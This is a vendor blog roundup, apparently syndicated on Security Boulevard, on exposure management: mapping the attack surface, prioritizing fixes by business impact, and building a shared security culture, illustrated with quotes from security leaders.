As Aaron Roy wrote in Understanding Your Attack Surface: The Key to Effective Exposure Management, every application, server, cloud instance and employee laptop connected to the internet is a part of that surface. But unlike physical inventory, the digital attack surface is not static. It’s an amorphous and constantly expanding environment that has undergone significant changes in the wake of the move to remote work and the proliferation of connected devices. Plus, every new technology (think cloud, AI and more) forces even more change. 

To deal with this, modern security teams have had to quickly adapt. Running periodic vulnerability scans isn’t enough these days. 

So, what can you do in the face of this change? 

Modern security teams need to take a more holistic approach with a continuous discovery process that maps the entire landscape. That means finding assets you didn’t even know you had, including the ever popular forgotten servers and shadow IT that can become gaping holes in your defenses. 

By meticulously identifying and mapping the entire attack surface, cybersecurity teams lay the critical foundation for a strong security program, transforming unknown risks into a manageable and defensible scope. Without this clarity, teams are left chasing shadows, which is a primary driver of the stress and burnout mentioned earlier.

“The goal isn’t to fix everything. It’s to fix what matters most. Chasing thousands of vulnerabilities without context wastes time and energy. Exposure management helps us shift the conversation from volume to impact.”

The strategic shift to proactive exposure management

With a clear picture of the attack surface, it’s time to figure out where to focus your defensive efforts. Contributors to the Exposure Management Academy have been clear: there’s been a fundamental shift in mindset from reactive vulnerability patching to proactive exposure management. 

For too long, security teams were caught in a cycle of chasing every vulnerability, regardless of severity, which is exhausting and inefficient. Exposure management breaks this cycle with a simple but powerful principle: prioritization over volume.

Robert Huber, Tenable CSO, has written about not trying to fix everything, notably in Turn to Exposure Management to Prioritize Risks Based on Business Impact. As Huber wrote, “Maybe it’s human nature. If there’s a problem — no matter how big or small — some of us are just wired to want to fix it right away and get it off our punch list.” He added: “So treating each one as number-one priority is a surefire shortcut to burnout and inefficiency.”

Reinforcing that point, Patricia Grant wrote in Exposure Management Works When the CIO and CSO Are in Sync that, “The goal isn’t to fix everything. It’s to fix what matters most. Chasing thousands of vulnerabilities without context wastes time and energy. Exposure management helps us shift the conversation from volume to impact.”

That conversation shift enables you to stop chasing your tail and start answering a couple of questions, such as: Is this weakness actually exploitable by an attacker? Is the asset it affects critical to our operations or revenue?

Exposure context and prioritization based on business impact

With exposures linked to real-world business impact, teams can prioritize their work with strategic precision. Instead of producing a report with thousands of low-level vulnerabilities (and a few critical ones buried in the noise), security groups can now confidently highlight the exposures that pose a real, material threat to the organization.

By breaking down the silos that have long plagued security, exposure management provides a unified view of all that security data. As Jorge Orchilles, Senior Director of Readiness and Proactive Security at Verizon, wrote in Exposure Management Is the Future of Proactive Security, this integrated approach enables smarter decisions and a more defensible security posture. It also changes the conversations at the executive level. 

Added Orchilles: “Instead of delivering long lists of vulnerabilities that mean little to non-technical leaders, we can present a clear picture in a few key points:

• What’s at risk?
• How could an attacker get in?
• What are the most urgent priorities to fix?

And when a major vulnerability hits, we don’t have to scramble to figure out if we are affected. We have the data at our fingertips.” That state of readiness, which replaces panic with process, is the ultimate antidote to reactionary stress.

“Security teams accustomed to working in silos must now share data and decision-making, which can be a tough adjustment. I found that the key to overcoming this is transparency and partnership. In fact, reading a bit of Dale Carnegie regularly can be just as important as a daily dose of Brian Krebs.”

Fostering a culture of shared responsibility for exposure management

A truly effective security program certainly uses technology, but it’s built on a foundation of people and partnership. As a cybersecurity professional, you probably understand that better than anyone. And, if you’re a leader, you are probably increasingly focused on building a durable culture of security throughout your organization, with a critical theme: security is a shared responsibility.

More than ever, leaders and practitioners alike have to focus on education, empowerment and collaboration. 

As Patricia Grant wrote, “At Tenable, we’ve taken a firm stance: when a zero-day emerges, patch your device within 24 hours or it’ll be automatically locked.”

Then she added: “But security doesn’t stop at the office door. No matter where employees are, they’re part of the defense. That’s why we focus on education — not to slow people down, but to empower them to keep the business safe.”

Grant is breaking down the walls between IT, security and business units. She’s fostering the teamwork the company needs to be resilient. This requires some soft skills, an often-overlooked part of the job. That means showing colleagues how security makes their jobs easier, not harder. 

As Jorge Orchilles wrote, “Security teams accustomed to working in silos must now share data and decision-making, which can be a tough adjustment. I found that the key to overcoming this is transparency and partnership. In fact, reading a bit of Dale Carnegie regularly can be just as important as a daily dose of Brian Krebs.”

By bringing everyone into the process, the folks who do the cybersecurity work will ensure that security isn’t something that is done to the organization. Instead, security can transform into what it should be: a shared mission, shaped and supported by everyone in the organization.

What do you think?

You’ve heard from us. We’d love to hear from you: 

• What are your thoughts on exposure management?
• How do you answer the “Where are we exposed?” question?
• How do you drive accountability for remediating exposures?

Share your feedback. We’ll keep it anonymous. 

 MktoForms2.loadForm("//info.tenable.com", "934-XQB-568", 14070);

The post ICYMI: Exposure Management Academy on Attack Surface Management, Proactive Security and More appeared first on Security Boulevard.